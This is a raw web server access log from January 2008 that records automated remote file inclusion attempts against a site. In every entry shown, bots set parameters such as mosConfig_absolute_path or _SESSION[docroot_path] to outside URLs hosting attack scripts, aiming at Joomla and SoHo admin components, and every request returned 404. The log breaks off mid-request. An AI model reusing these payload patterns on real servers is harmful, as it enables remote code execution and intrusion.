88.191.35.198 - - [13/Jan/2008:12:42:55 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.21.69.107 - - [13/Jan/2008:12:43:02 -0800] "GET /logs/index.php?option=com_saltencrypter&Itemid=&mosConfig_absolute_path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
61.67.192.5 - - [13/Jan/2008:12:43:05 -0800] "GET /logs/access_071210.log/index.php?dir=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.5 - - [13/Jan/2008:12:43:06 -0800] "GET /index.php?dir=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.5 - - [13/Jan/2008:12:43:06 -0800] "GET /logs/index.php?dir=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.69.107 - - [13/Jan/2008:12:43:07 -0800] "GET /index.php?option=com_saltencrypter&Itemid=&mosConfig_absolute_path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
61.67.192.5 - - [13/Jan/2008:12:43:18 -0800] "GET /logs/access_071014.log/index.php?dir=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.9.145.107 - - [13/Jan/2008:12:43:53 -0800] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.145.107 - - [13/Jan/2008:12:43:54 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.145.107 - - [13/Jan/2008:12:43:54 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.13.250.115 - - [13/Jan/2008:12:43:54 -0800] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.250.115 - - [13/Jan/2008:12:43:54 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.250.115 - - [13/Jan/2008:12:43:55 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [13/Jan/2008:12:43:55 -0800] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [13/Jan/2008:12:43:55 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.2.242 - - [13/Jan/2008:12:43:55 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.250.115 - - [13/Jan/2008:12:43:59 -0800] "GET /logs/access_071217.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.119.217.23 - - [13/Jan/2008:12:43:59 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.9.145.107 - - [13/Jan/2008:12:44:00 -0800] "GET /logs/access_071217.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:12:44:02 -0800] "GET /logs/access_071112.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.12.20 - - [13/Jan/2008:12:44:03 -0800] "GET /component/opt